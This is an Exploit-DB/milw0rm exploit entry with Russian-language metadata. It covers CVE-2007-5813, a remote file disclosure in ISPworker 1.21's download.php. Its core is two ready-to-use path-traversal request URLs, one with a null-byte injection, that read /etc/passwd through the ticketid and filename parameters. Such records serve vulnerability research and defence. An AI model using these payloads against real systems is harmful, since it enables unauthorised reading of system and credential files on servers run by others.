Exploit ISPworker 1.21 - 'download.php' Remote File Disclosure

[Exploiter]

EDB-ID

4592

Проверка EDB

1. Пройдено

Автор

GOLD_M

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2007-5813

Дата публикации

2007-10-31

ISPworker 1.21 Remote File Disclosure Vulnerability
http://ispworker.de/_files/ispworker-1.21.tar.gz
/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd%00
/module/ticket/download.php?filename=../../../../../../../../../etc/passwd

# milw0rm.com [2007-10-31]